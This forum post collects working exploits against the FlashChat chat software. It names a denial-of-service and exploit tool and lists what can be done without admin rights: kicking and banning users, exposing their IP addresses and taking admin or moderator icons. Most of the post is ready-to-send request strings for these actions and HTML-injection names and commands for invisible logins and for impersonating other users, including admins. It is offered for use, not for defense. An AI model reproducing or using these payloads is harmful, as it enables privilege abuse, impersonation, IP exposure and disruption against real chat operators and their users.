I will collect all the exploits and tools into this very post soon, so it is easy to find all the exploits and tools by only reading first post.
In this topic you will find: (only descriptions for now)
Gadgets:
flashchatz - cmd based program wrote by Luigi Auriemma, it is a fake user DOS attack and exploit tool for flashchat (attached to post, in downloads and on Luigi's site)
Extreme Flashchat-X - GUI based flashchat client with multiple exploits in it (see below). wrote by dark_lord_tnt (see in topic).
Exploits:
Following things can be done without knowing admin/mod password:
kickout another user (exept admin)
ban another user (exept admin)
check any user's IP with the "/whois" command
add room/s
ring bell
get any icon/emoticon in front of your name (including admin icon)
get any icon/emoticon into the message
maybe i missed something, but i will update first post time to time, any ill try to add all the exploits into this post.
//////////////////////////////////////////////////////////////////////////////////////////////////////////
Code: Select all
Bell
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=
add room
sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=
admin icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=
mod icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=
ip ban packet:
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
5581 - id
whois packet:
sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id=
room alert:
sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=
sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=
Code: Select all
5D&t=
Code: Select all
5D&s=7&t=
//////////////////////////////////////////////////////////////////////////////////////////////////////////
HTML/PHP code exploits:
*Invisible name:
enter this as name
Code: Select all
</b>
-login with invisible name
-now use this command to impersonate somebody
Code: Select all
/me <font color="#000000">[NAME] 0:00 xm: </font>
Code: Select all
/me <font color="#FFFFFF">:D [NAME]: </font>
Code: Select all
/me <font color="#FF0000">:admin: [NAME]: </font>
to get colored text too, do this:
Code: Select all
/me <font color="#FF0000">:D [NAME]: </font> <font color"=#8000BF">YOURMESSAGEHERE</font>
login with the following code/name
Code: Select all
<fontsize="13"></i><a href="http://link.here">Name</a></b>